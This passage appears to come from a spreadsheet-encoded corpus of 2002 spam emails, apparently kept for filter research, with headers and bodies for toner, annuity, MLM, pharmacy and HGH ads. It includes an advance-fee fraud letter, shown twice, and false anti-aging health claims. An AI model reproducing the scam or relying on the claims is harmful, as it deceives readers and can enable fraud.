Price**\n\n`**39 ---- 6R900 75A ---- $ 55.50  \n40 ---- 6R903 98A ---- $ 46.50  \n41 ---- 6R902 95A ---- $ 49.50  \n42 ---- 6R901 91A ---- $ 65.50  \n43 ---- 6R908 06A ---- $ 42.50  \n44 ---- 6R899 74A ---- $ 47.50  \n45 ---- 6R928 96A ---- $ 72.50  \n46 ---- 6R926 27X ---- $ 84.50  \n47 ---- 6R906 09A ---- $ 92.50  \n48 ---- 6R907 4MV ---- $ 89.50  \n49 ---- 6R905 03A ---- $ 46.50**`\n\n**_30 Day unlimited warranty included on all products  \nGT Toner Supplies guarantees these cartridges to be free from defects in\nworkmanship and material._ **\n\n**_We look forward in doing business with you._**\n\n**_Customer   Satisfaction guaranteed_**\n\n**I f you are ordering by e-mail or c.o.d. please fill out an order  \nform with the following information: _    _ _    _      _ _  \n  \nphone number  \ncompany name  \nfirst and last name  \nstreet address  \ncity, state zip code                                ****_Order Now _or call\ntoll free  1-866-237-7397 ** **  \n  \nIf you are ordering by purchase order please fill out an order form  \nwith the following information:    _    _     **\n\n**purchase order number  \nphone number  \ncompany or school name  \nshipping address and billing address  \ncity, state zip code                                ****_Order Now_**\n\n**_All trade marks and brand names listed above are property of the respective  \nholders and used for descriptive purposes only. _ **\n\n\--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http://images.google.com http://images.google.com http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5467</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - DNA Brokerage" &lt;dna@insurancemail.net&gt;\nDate: Wed, 24 Jul 2002 19:26:04 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 19:26:04 -0400</t>
  </si>
  <si>
    <t>"IQ - DNA Brokerage" &lt;dna@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>Free Multi-Generational Sales Kit</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_0007_01C23333.1932BF20 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  FREE Multi-Generational Sales Kit    Just ask for our Simple 7 annuity product kit!   _____    Simple Seven(tm) Product Highlights  	Short 7 Year Surrender Period	   	2% Premium Bonus on First Year Premium	   	Free Multi-Generational Sales Kit (Stretch IRA Concept) 	  	75% Participation Rate	   	Issue Ages 0-90 Qualified or Non-Qualified	   	No Fees, Margins or Spreads	    _____   Call today for more information!  800-245-2801 ? or ? Please fill out the form below for more information	  Name:	  	 	 Address:	  	 City:	    State:    Zip:  	 E-mail:	  	 Phone:	  	  	  	 	   	    DNA Brokerage FOR AGENT USE ONLY. NOT INTENDED FOR CONSUMER SOLICITATION PURPOSES. The Simple Seven is issued on forms LC126A (group cert) or LS126A (individual contract) by North American Company for Life and Health Insurance, Chicago, Illinois. This product and some of its features is not available in all states. We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL]   Legal Notice    ------=_NextPart_000_0007_01C23333.1932BF20 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Free Multi-Generational Sales Kit =20 =20      =20        =20        =20            =20              =20                  Short 7 Year Surrender Period =20                  2% Premium Bonus on First Year Premium =20                  Free Multi-Generational Sales Kit (Stretch IRA = Concept)  =20                  75% Participation Rate =20                  Issue Ages 0-90 Qualified or = Non-Qualified =20                  No Fees, Margins or Spreads =20           =20              =20            Call today for more information!             — or — =20                  =20                      =20                         Please fill = out the form below for more information =20                         Name: =20                            =20                         Address: =20                            =20                         City:  =20                                                        State:=20                                                        Zip:=20                            =20                         E-mail: =20                            =20                         Phone: =20                            =20                           =20                              =20                            FOR AGENT USE ONLY. NOT = INTENDED FOR=20               CONSUMER SOLICITATION PURPOSES. The Simple Seven is issued = on forms=20               LC126A (group cert) or LS126A (individual contract) by = North American=20               Company for Life and Health Insurance, Chicago, Illinois. = This product=20               and some of its features is not available in all = states.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0007_01C23333.1932BF20--</t>
  </si>
  <si>
    <t>5474</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "garry" &lt;ggs020255@hotmail.com&gt;\nDate: Wed, 24 Jul 2002 19:14:09 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 19:14:09 -0700</t>
  </si>
  <si>
    <t>"garry" &lt;ggs020255@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Greetings from Calif!</t>
  </si>
  <si>
    <t>!Want to make a million bucks this year?\nMe too but it's probably not going happen!\n \nHowever if your looking for the opportunity to\nmake a couple thousand a week,\nworking form home, with your pc, we need to talk.\n \nIf you're over 18 and a US resident,\n \nJust Click REPLY\n \nSend me your Name, State,\nComplete telephone number,\nand the best time to contact you.\n \nI will personally speak with you within 48 hours.\nTo be removed from this mailing list,  please type remove in the subject column.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5437</t>
  </si>
  <si>
    <t>To: "0703@exclusiveinternetoffer.com" &lt;0703@exclusiveinternetoffer.com&gt;\nFrom: "4everyoung@telekbird.com.cn" &lt;4everyoung@telekbird.com.cn&gt;\nDate: Wed, 24 Jul 2002 18:53:12 +0800</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 18:53:12 +0800</t>
  </si>
  <si>
    <t>"4everyoung@telekbird.com.cn" &lt;4everyoung@telekbird.com.cn&gt;</t>
  </si>
  <si>
    <t>"0703@exclusiveinternetoffer.com" &lt;0703@exclusiveinternetoffer.com&gt;</t>
  </si>
  <si>
    <t>Medical Break-Though In Cell Rejuvenation</t>
  </si>
  <si>
    <t>&lt;=21-- saved from url=3D(0022)[URL]http://internet.e[/URL] --&gt; &lt;=21DOCTYPE HTML PUBLIC =22-//W3C//DTD HTML 4.01 Transitional//EN=22&gt; &lt;=21--=5Bif gte mso 9=5D&gt; Business &lt;=21=5Bendif=5D--&gt; EVER YOUNG Nutritionals GH 2000 - Reverse Aging Feeling      Young Is A Choice Your Source = For Anti-Aging      Information Here's what doctors and users=             are saying about EverYoung             Nutritionals GH2000 spray: &amp;=238220;After 2 weeks, I noticed a             higher level of energy,             increased sexual             energy and my memory and             vision were enhanced."             Dr. Richard Boyd             __________________             &amp;=238220;Wrinkles have disappeared             from my hands and around             my eyes; my beard, which             was almost entirely white has             returned to its original             black color; sleep patterns have             returned to those of my             youth, I have sexually             returned to my mid-teens.&amp;=238221;             Dr. Mark Born             __________________              "This is the second time I have             ordered and I'm having great             success with your product.             I am 43, and was going through             the yucky midlife stuff women go             through...hot flashes, mood swings,             etc. All that has stopped and feel             great again. Was shocked to see             my gray hairs go away in just a             month. This product is amazing...             Thanks again=21"              Deanne in Alaska ..  ...  FREE=  U.S.            Fed Ex Ground               Shipping &amp; Handling               For Customers in               The Continental USA.               We Ship Anywhere In The World=21&lt;= /td&gt;          Starting                Today, You Can Look Younger,                Feel Better And Get Stronger With The               Time-Tested Power of HGH           Learn More Somatotropin                      (aka Growth Factor, hGH, HGH, Growth Hormone, GH, H= uman Growth                      Hormone) is naturally produced by the anterior pitu= itary gland                      in the brain and declines with age, so it is a natu= ral substance                      already in your body right this moment. HGH is know= n as the                      master hormone because it exerts effects over all o= ther hormones                      in the body, including Testosterone, Estrogen, Prog= esterone                      and DHEA. Augmenting declining somatotropin levels = by giving                      your body daily ingestible somatotropin, can create=  a more                      youthful hormone balance that results in dramatic i= mprovements                      in your health.                       Somatotropin supplementation                      is a life-enhancement. Lives that were once shatter= ed by fatigue,                      illness or the ravages of aging, now fourish with t= he help                      of somatotropin supplementation.                       Somatotropin from the pituitary                      works by stimulating protein production in all tiss= ues of                      the body. This results in an increase in organ heal= ing and                      regeneration, which is associated with increase res= istance                      to illness and injury. No matter your age, we GU= ARANTEE                     you will look and feel BETTER than                     you ever imagined possible. LE= ARN MORE EVERYOUNG                GH2000               The maximum FDA allowable HGH sold online that stimulates=  the anterior                of the pituitary gland. 2000ng per mil. Check the dosage = of our                competitors. ATOMIC                FUEL HGH Activator               Works in conjunction with Ever Young GH2000 and stimulate= s the posterior of                the pituitary gland. Contains essential Amino Acids for a=  healthy                body. BARLEY                GREEN Powder &amp; Caplet Tablets               Most pure natural food for your living cells containing 1= 8 Amino                Acids. Barley Green is an anti-oxidant and promotes alkal= inity and                healthy cells CLICK              HERE TO ORDER NOW Human              Growth Hormone              (HGH) allows users to: Burn fat             Build lean muscle             Sleep better             Lucid dreams             Anti-aging             Reduce cellulite             Soften skin and wrinkles              Faster injury healing             Improve vision             Increase stamina             Reverse osteoporosis             Eliminate depression             Eliminate chronic fatigue             Improve exercise performance             Reduce high blood pressure             Sexual performance &amp; pleasure                  Increase energy &amp; motivation               Increase HDL (good cholesterol)               Decrease LDL (bad cholesterol)               Enhance immune functions               Reduced joint pain &amp; stiffness               Healthier, more lustrious hair               ....and many more benefits Visit our web site at [URL]http://www.everyoung-gh.net[/URL]     Your          privacy is extremely important to us.         This message is sent to you because you were selected as a qual= ified recipient          of our          special introductory promotion for Ever Young Nutritionals GH20= 00 at http://www.everyoung-g= h.net         To be removed at any time simply, click     = here= . *****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internet.e http://www.everyoung-gh.net http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5438</t>
  </si>
  <si>
    <t>To: &lt;cpunks@einstein.ssz.com&gt;\nFrom: "MLM Insider Forum" &lt;mlm1leads4u@amuro.net&gt;\nDate: Wed, 24 Jul 2002 18:02:24 +0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 18:02:24 +0700</t>
  </si>
  <si>
    <t>"MLM Insider Forum" &lt;mlm1leads4u@amuro.net&gt;</t>
  </si>
  <si>
    <t>&lt;cpunks@einstein.ssz.com&gt;</t>
  </si>
  <si>
    <t>Cost-Effective MLM/Bizop Phone-Screened Leads</t>
  </si>
  <si>
    <t>Hello,  \n  \n\n_Premium Phone Qualified  \nBusiness Opportunity Leads  \n  \n_If you're spending money marketing a Business **Opportunity** or **MLM** ,  \nyou will **__definitely_ _**be interested in  \nwhat we have to offer you.  \n  \n  \n\nYou're __tired_ _of blindly spending money for leads and not having  \nany idea what kind of response you'll get from it.  Sometimes  \ncalling 100 people **without one single signup!**   Sometimes  \ntalking to people who have been **bombarded** by bizop pitches  \nto the point of them _hanging up_ when you call!  (Leads oversold)  \n  \nWe're here to help!  \n  \nWe'll get you __qualified leads for your MLM or Business Opportunity.__  \n  \n**Period.**  \n  \nNo qualifiers, no conditions, no nonsense.  \n  \nWe'll do it __quickly,__ and __professionally__.  \n  \n_And we won't ask you for a _single dime_ without **guaranteeing** _results_!  \n  \n  \n_**_Here's How We Generate Our Leads...  \n  \n_**- **All of these Leads are generated IN-HOUSE!  \n  \n**\- One source we use for Lead-generation is a **Business Opportunity  \nSeeker Lead List** of people who have requested info. about making  \nextra income from home by either filling out an online questionnaire,  \nor responding to an email ad, classified ad, postcard, etc.,.  \n  \n\- The other source we use is an Automated Call Center.  \nWe have computerized software that dials up LOCAL residents,  \nplays a recorded message asking them if they're interested in  \nmaking money from home.  If they are, the system records their  \nname and phone number for us to CALL BACK AND QUALIFY.  \n  \n\- The prospects that come from either of the above sources are then  \n**PHONE INTERVIEWED BY US, here in our offices** and the following  \ninfo. is asked (after confirming their desire to find an opportunity):  \n  \n**Name:  \nEmail:  \nPhone:  \nBest time to call:  \nState:  \nReason they want to work from home!:  \nHow much they want to make per month:  \nHow much time they can commit per week:  \nHow much money they have available for startup:  \nIf they see an opportunity, how soon they would get started:  \n  \nWe'll close by telling them they'll be contacted by no  \nmore than 3 or 4 people regarding different opportunities.  \n  \n**\- Then the Leads are submitted to a website we set up for you,  \nfrom which the results are then forwarded to you by email.  \n  \n\- This way, **you get the Leads fresh, and in *real-time***  \n(only minutes old).  Never more than 24 hours old.  Guaranteed!  \n  \n\- We **GUARANTEE** that you'll receive _AT LEAST_ a valid _Name_ ,  \n_Phone Number_ and the _Time-Date Stamp_ corresponding to when  \nthe Lead was generated!  However, almost ALL leads will have  \nALL of the information asked above.  \n  \n  \n**Benefits of our Phone Qualified Lead Generation System:  \n  \n**1\. They will be **Extremely Qualified** due to the nature of the  \nqualifying questions that will be asked (above).  \n  \n2\. They are **Super-Fresh!**   Delivered in Real-Time only **moments  \n**after they are contacted and qualified!  (Not 30-120 days old)  \n  \n3\. They're **Targeted.**   Each Lead we generate originates from a  \ntargeted list of business opportunity seekers.  \n  \n4\. They're **Highly Receptive!**   **Receptivity is very, very high**  \nbecause they **aren't bombarded by tons of people pitching  \nthem on opportunities!**  Also they'll remember speaking to  \nsomeone over the phone.  Especially since **we tell them to  \nexpect your call!  \n  \n**5\. **No "feast or famine"** activity.  Leads will be coming in  \nregularly.  You dictate the flow!  \n  \n6\. **No more cold calls!   **We tell your prospects you'll be calling.  \n  \n7\. You can ***personalize* your approach** with the info. you  \nget with each Lead!  \n  \n8\. **Save Time.   **Naturally, better Leads means less calls to get a sale.  \n  \n9\. **Lower "burnout" factor.**  Calling red-hot Leads makes it easier  \nto pick up the phone, day in and day out.  \n  \n10\. You can **sort your Leads** based on their responses and call the  \nhottest ones first.  \n  \n11\. You can **get new reps started quicker** using these Leads due  \nto **higher closing ratios**.  Of course, this builds faster and stronger  \nmomentum, and skyrockets "new rep retention" as a result of  \n"quick successes".  \n  \n12\. The **Leads will be uniform** \- almost all leads will have the info.  \nindicated above. (All leads will have valid phone numbers.)  \n  \n13\. They're **double-qualified** because to generate the Lead,  \na list of previous business opportunity seekers is used.  \n  \n14\. Excellent **control of the flow of Leads** coming through.  \n  \nIf you've been trying to run things too long without a _steady flow_ of high  \nquality leads, call us __NOW__ to get things in motion.  Just let us know  \nwhat program you want to advertise and we'll create a customized  \nlead-generation campaign for you.  \n  \nSince your need to get business moving has probably never been  \nmore critical than it is today, why not call us **_NOW!  \n  \n_**These are **__fresh, highly qualified leads__** because these people aren't  \njust responding to some "Generic Business Opportunity" ad, they're  \ncontacted **over the phone specifically** for **_YOUR_** company!  And we  \nforward you the leads within **_minutes_** of the lead being generated - not  \ndays, weeks, or months!  \n  \n  \n\nStart Generating As Many **SIGN-UPS** as You Can Handle!  \nExplode Your Downline and Income!  \n  \n**Call For Details and Discount Pricing!  \nToll Free _1-866-853-8319_ ext.1  \n  \n**Or email us here for full details  \n  \n  \n  \n\nTo opt out _Click Here  \n  \n  \n_ \--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463</t>
  </si>
  <si>
    <t>To: gibbs@midrange.com\nFrom: Consumer Today &lt;reply_3@ct2.consumertoday.net&gt;\nDate: Wed, 24 Jul 2002 17:29:31 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 17:29:31 -0400 (EDT)</t>
  </si>
  <si>
    <t>Consumer Today &lt;reply_3@ct2.consumertoday.net&gt;</t>
  </si>
  <si>
    <t>gibbs@midrange.com</t>
  </si>
  <si>
    <t>Free New Cars for the Taking!</t>
  </si>
  <si>
    <t>Get a FREE CAR or SUV!  \nCLICK HERE!  \n  \nThere are hundreds of companies  \ngiving away FREE CARS!  \n  \n![]([URL]http://www.bd12.com[/URL]  \n  \nChevy Blazer  \nDodge Durango  \nFord Windstar  \nHonda Civic And More...!  \nCLICK HERE! **  \n**** **  \n  \n| We take your privacy very seriously and it is our policy never to send\nunwanted email messages. This message has been sent to gibbs@midrange.com\nbecause you are a member of Consumer Today or you signed up with one of our\nmarketing partners. To unsubscribe, simply click _here_ (please allow 3-5\nbusiness days for your unsubscribe request to be processed). Questions or\ncomments - send them to _customerservice@consumertoday.net_.  \n---  \n![]([URL]http://ct2.consumertoday.net[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.bd12.com http://ct2.consumertoday.net</t>
  </si>
  <si>
    <t>5461</t>
  </si>
  <si>
    <t>To: Industrial.Linux.User@webnote.net\nFrom: kypdlinux4oems &lt;sahilinux4oems@sixnet-io.com&gt;\nDate: Wed, 24 Jul 2002 16:41:16 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 16:41:16 -0400</t>
  </si>
  <si>
    <t>kypdlinux4oems &lt;sahilinux4oems@sixnet-io.com&gt;</t>
  </si>
  <si>
    <t>Industrial.Linux.User@webnote.net</t>
  </si>
  <si>
    <t>ISA Article on Embedded Real-Time Linux Automation Applications . gji</t>
  </si>
  <si>
    <t>Industrial LINUX News: \n\nThe June issue of the ISA's InTech Magazine has an interesting article on how truly open Linux applications can lower development cost and increase the performance and reliability of industrial automation. \n\nA copy of the the article can be found at:  [URL]http://www.sixnet-io.com[/URL]\n\n\nThis Linux news update brought to you by:  [URL]www.Linux4oems.info[/URL] \n\n\n\n------------------------------------------------------------------------------\n\n\n\nIf you don't want to receive future Linux news updates, please reply to this e-mail with the subject "unsubscribe".  You may also unsubscribe or resolve subscription difficulties by calling SIXNET at 518-877-5173 or e-mailing:  linuxnews@sixnet-io.com\n\n\n\n\n\n\n\n\n\n\n.\n\nnaorwnwbxbsttgvelamusbs</t>
  </si>
  <si>
    <t>http://www.sixnet-io.com www.Linux4oems.info</t>
  </si>
  <si>
    <t>5450</t>
  </si>
  <si>
    <t>To: cypherpunks@einstein.ssz.com\nFrom: " mariam" &lt;aaamariam2002@techemail.com&gt;\nDate: Wed, 24 Jul 2002 16:23:20</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 16:23:20</t>
  </si>
  <si>
    <t>" mariam" &lt;aaamariam2002@techemail.com&gt;</t>
  </si>
  <si>
    <t>your help</t>
  </si>
  <si>
    <t>DEAR SIR,\n\nI am MRS MARIAM ABACHA, wife of the late Nigerian\nHead of State, General Sani Abacha who died on \nthe 8th\nof June 1998 while still on active duty. I am\ncontacting you in view of the fact that we will \nbe of\ngreat assistance to each other likewise \ndeveloping a\ncordial relationship.\n\nI currently have within my reach the sum of \nthirty\nsix million United States Dollars \n(US$36,000,000) in\ncash, which I intend to use for investment \npurposes\nspecifically in your country. This money came \nas a\nresult of a payback contract deal between my \nlate\nhusband and a Russian firm on our country's\nMulti-Billion Dollars Ajaokuta Steel Plant. The\nRussian partners returned my husbands share of\nUS$36,000,000 after his death and lodge it with \nmy\nlate husband's security company in Nigeria of \nwhich I\nam a director. Right now the new civilian \ngovernment\nhave intensified their probe on my husband's \nfinancial\nresources and they have revoked our licenses \nthat\nallows us to own a financial and oil company. \nIn view\nof this, I acted very fast to withdraw the\nUS$36,000,000 from the company's vault and \ndeposited\nit in a privately erected security safe abroad.\n\nNo record ever existed concerning the money \nneither is\nthe money traceable by the Government because \nthere is\nno documentation showing that we received the \nmoney\nfrom the Russians.\n\nDue to the current situation in the country \nconcerning\nGovernment attitude towards my family, it has \nbecome\nquite impossible for me to make use of this \nmoney\nwithin, thus I seek assistance to transfer this \nmoney\ninto your safe bank account. On your consent, I \nshall expect\nyou to contact me urgently to enable us discuss\ndetails of this transaction.\n\nBearing in mind that your assistance is needed \nto\ntransfer the funds, I propose a commission of \n20% of\nthe total sum to you for the expected services \nand\nassistance. Your urgent response is highly \nneeded so\nas to stop further contacts. all correspondent \nshould be forwarded to this EMAIL:zenab.m@ompadec.zzn.con\nor you can call my son mobile:hamza   234-8023137978 I  use this \nopportunity to implore you to exercise the most \nutmost\nindulgence to keep this matter extra ordinarily\nconfidential what ever your decision while I \nawait your\nprompt response.\n\nBest personal regards,\n\nMRS MARIAM ABACHA.\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5449</t>
  </si>
  <si>
    <t>To: cpunks@einstein.ssz.com\nFrom: " mariam" &lt;aaamariam2002@techemail.com&gt;\nDate: Wed, 24 Jul 2002 16:13:23</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 16:13:23</t>
  </si>
  <si>
    <t>DEAR SIR,\n\nI am MRS MARIAM ABACHA, wife of the late Nigerian\nHead of State, General Sani Abacha who died on \nthe 8th\nof June 1998 while still on active duty. I am\ncontacting you in view of the fact that we will \nbe of\ngreat assistance to each other likewise \ndeveloping a\ncordial relationship.\n\nI currently have within my reach the sum of \nthirty\nsix million United States Dollars \n(US$36,000,000) in\ncash, which I intend to use for investment \npurposes\nspecifically in your country. This money came \nas a\nresult of a payback contract deal between my \nlate\nhusband and a Russian firm on our country's\nMulti-Billion Dollars Ajaokuta Steel Plant. The\nRussian partners returned my husbands share of\nUS$36,000,000 after his death and lodge it with \nmy\nlate husband's security company in Nigeria of \nwhich I\nam a director. Right now the new civilian \ngovernment\nhave intensified their probe on my husband's \nfinancial\nresources and they have revoked our licenses \nthat\nallows us to own a financial and oil company. \nIn view\nof this, I acted very fast to withdraw the\nUS$36,000,000 from the company's vault and \ndeposited\nit in a privately erected security safe abroad.\n\nNo record ever existed concerning the money \nneither is\nthe money traceable by the Government because \nthere is\nno documentation showing that we received the \nmoney\nfrom the Russians.\n\nDue to the current situation in the country \nconcerning\nGovernment attitude towards my family, it has \nbecome\nquite impossible for me to make use of this \nmoney\nwithin, thus I seek assistance to transfer this \nmoney\ninto your safe bank account. On your consent, I \nshall expect\nyou to contact me urgently to enable us discuss\ndetails of this transaction.\n\nBearing in mind that your assistance is needed \nto\ntransfer the funds, I propose a commission of \n20% of\nthe total sum to you for the expected services \nand\nassistance. Your urgent response is highly \nneeded so\nas to stop further contacts. all correspondent \nshould be forwarded to this EMAIL:zenab.m@ompadec.zzn.con\nor you can call my son mobile:hamza   234-8023137978 I  use this \nopportunity to implore you to exercise the most \nutmost\nindulgence to keep this matter extra ordinarily\nconfidential what ever your decision while I \nawait your\nprompt response.\n\nBest personal regards,\n\nMRS MARIAM ABACHA.\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464</t>
  </si>
  <si>
    <t>To: rajen@sswt.com\nFrom: "Stephanie Curry"&lt;Pharmacy@onebox.com&gt;\nDate: Wed, 24 Jul 2002 16:02:09 -0600</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 16:02:09 -0600</t>
  </si>
  <si>
    <t>"Stephanie Curry"&lt;Pharmacy@onebox.com&gt;</t>
  </si>
  <si>
    <t>rajen@sswt.com</t>
  </si>
  <si>
    <t>Phentermine,Xenical,Viagra</t>
  </si>
  <si>
    <t>\n\nWe offer the Absolute Lowest prices on Viagra and other FDA-approved\nmedications.\n\nMedication prescribed by licensed U.S. Physicians and shipped via overnight\ndelivery.\n\nFree Medical Consultation Available 24 hours... 7 Days a week!\n\nNo Physical Exam Necessary.\n\nFeatured Products Available for immediate delivery at Edrugsource.com include:\n\n  * **Viagra **\n  * **Phentermine **\n  * **Celebrex **\n  * **Xenical **\n  * **Plus Much More!**\n\n**Weight Loss - Sexual Health - Skin Care - Pain Relief- Stop Smoking **\n\nVisit Edrugsource.com for a discrete, safe and secure experience.\n\nCLICK HERE to see what we have!!!\n\n  \nTo be excluded from our mailing list,  CLICK HERE . You will then be\nautomatically deleted from future mailings.  \n=============================================================================\n\n\--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442</t>
  </si>
  <si>
    <t>To: sitescooper-talk@example.sourceforge.net\nFrom: "TR Posta NetWorks" &lt;sprkmpny@e-kolay.net&gt;\nDate: Wed, 24 Jul 2002 15:57:41 +0300</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 15:57:41 +0300</t>
  </si>
  <si>
    <t>"TR Posta NetWorks" &lt;sprkmpny@e-kolay.net&gt;</t>
  </si>
  <si>
    <t>sitescooper-talk@example.sourceforge.net</t>
  </si>
  <si>
    <t>[scoop] BiLiYORUZ REKLAMA iHTiYACINIZ VAR! BUNUN iCiN BURADAYIZ.. 24.07.2002 15:57:41</t>
  </si>
  <si>
    <t>=3Chtml=3E=3Chead=3E=3Cmeta http-equiv=3DContent-Language content=3Dtr=3E=3Cmeta http-equiv=3DContent-Type content=3D=22text=2Fhtml=3B charset=3Dwindows-1254=22=3E=3Ctitle=3ETR Rehber 6=3C=2Ftitle=3E=3C=2Fhead=3E\n=3Cbody background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=3E=22 topmargin=3D1 leftmargin=3D1 bgcolor=3D=22#CECFFF=22=3E\n      =3Cp align=3D=22center=22=3E\n      =3Cimg border=3D=222=22 src=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fbanner1=2Egif=22 align=3D=22center=22 width=3D=22610=22 height=3D=2281=22=3E=3Cdiv align=3D=22center=22=3E\n  =3Ccenter=3E\n  =3Ctable border=3D1 cellspacing=3D1 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D612 id=3DAutoNumber1 height=3D77 bgcolor=3D=22#CECFFF=22 background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=22=3E=3Ctr=3E\n    =3Ctd width=3D606 height=3D16 bgcolor=3D=22#00FFFF=22=3E=3Cp align=3Dcenter=3E=3Cb=3E=3Cfont face=3DArial color=3D=22#FF0000=22=3E =3Cmarquee scrolldelay=3D100 scrollamount=3D9=3EREKLAMLARINIZA SERVET =D6DEMEYiN!!! UCUZ=2C KOLAY VE KALICI REKLAMLARINIZ iCiN BiZi ARAYINIZ=2E=2E=2E=3C=2Fmarquee=3E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E\n      =3Ctd width=3D606 height=3D43 bgcolor=3D=22#00FFFF=22=3E=3Cp align=3Dcenter=3E=3Cfont face=3DTahoma size=3D2 color=3D=22#000000=22=3E\n      =3Cbr=3E\n    Bu ileti size islerinizi kolaylastirmak=2C satislarinizi arttirmak=2C kisacasi \n  milyonlara sesinizi duyurmak icin g=F6nderilmistir=2E Bu t=FCrden tanitimlarla \n  ilgilenmiyorsaniz bu iletiyi=2C &amp;quot=3Bilgilenecegini d=FCs=FCnd=FCg=FCn=FCz&amp;quot=3B tanidiklariniza \n  g=F6nderiniz=2E Bu iletinin size ve tanidiklariniza kazandiracaklarina \n  inanamayacaksiniz!=2E=3Cbr=3EHerseye ragmen bizden e-mail almak istemiyor ve satisa sundugumuz=3Cbr=3E&amp;nbsp=3Blistelerden cikmak istiyorsaniz \n  bu iletiyi bos olarak cevaplamaniz yeterli olacaktir=2E=3Cbr=3E\n  T=FCm =F6nerilerinizi dikkate alip degerlendiriyoruz=2E=2E L=FCtfen olumlu olumsuz \n  elestirileriniz icin web sayfamizdaki iletisim formunu kullaniniz=2E=2E=3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E\n      =3Ctd width=3D606 height=3D1 bgcolor=3D=22#000000=22 bordercolorlight=3D=22#00FFFF=22 bordercolordark=3D=22#C0C0C0=22=3E\n      =3Cb=3E=3Cfont color=3D=22#96B4D8=22 face=3D=22Verdana=22=3E\n      =3Cmarquee scrolldelay=3D=2252=22 scrollamount=3D=225=22=3ETR Rehber 8=2E0 G=FCncellenme Tarihi 10 Temmuz 2002'dir=2E=2E TR Rehber ve World Rehberi aldiginizda bir sonraki g=FCncellemede&amp;nbsp=3B herhangi bir =FCcret =F6demeyeceksiniz=2E=2E Daha =F6nceden alis-veris de bulundugumuz m=FCsterilerimize %50 indirim imkani sunuyoruz=2E=2E=3C=2Fmarquee=3E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n      =3C=2Ftr=3E=3Ctr=3E=3Ctd width=3D606 height=3D184 align=3D=22center=22=3E\n      &amp;nbsp=3B=3Cdiv align=3D=22center=22=3E\n        =3Ccenter=3E\n        =3Ctable border=3D=221=22 cellpadding=3D=220=22 cellspacing=3D=220=22 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D=2290%=22 id=3D=22AutoNumber4=22 height=3D=2220=22=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E\n      =3Cp align=3D=22center=22=3E=3Cu=3E=3Cfont color=3D=22#0000FF=22 size=3D=224=22=3E=3Cb=3E=2E=3A=3ARehberlerimizin Ortak \n      =D6zellikleri=3A=3A=2E=3C=2Fb=3E=3C=2Ffont=3E=3C=2Fu=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E=3Cfont face=3DVerdana size=3D2=3E\n            Detayli kategorili =3B daha fazla bilgi i=E7in web sayfam=FDzi ziyaret \n            ediniz=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E=3Cfont face=3D=22Verdana=22 size=3D=222=22=3E\n            ilave programlar =3B mailling i=E7in min=2E d=FCzeyde programlar=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=2210=22 colspan=3D=223=22=3E=3Cfont face=3DVerdana size=3D2=3E\n            Kullanimi kolayla=FEt=FDr=FDc=FD t=FCrk=E7e d=F6k=FCman ve video format=FDnda \n            a=E7=FDklamalar=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=229=22 colspan=3D=223=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3ESanayi Rehberi =3Cu=3E\n            =3Cfont color=3D=22#FF0000=22=3E=3Cb=3EHediyeli=2E=2E=3C=2Fb=3E=3C=2Ffont=3E=3C=2Fu=3E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=229=22 colspan=3D=223=22=3E\n      =3Cp align=3D=22center=22=3E\n  =3Cb=3E \n  =3Cfont face=3DVerdana size=3D=222=22=3E800=2E000 =3C=2Ffont=3E=3C=2Fb=3E 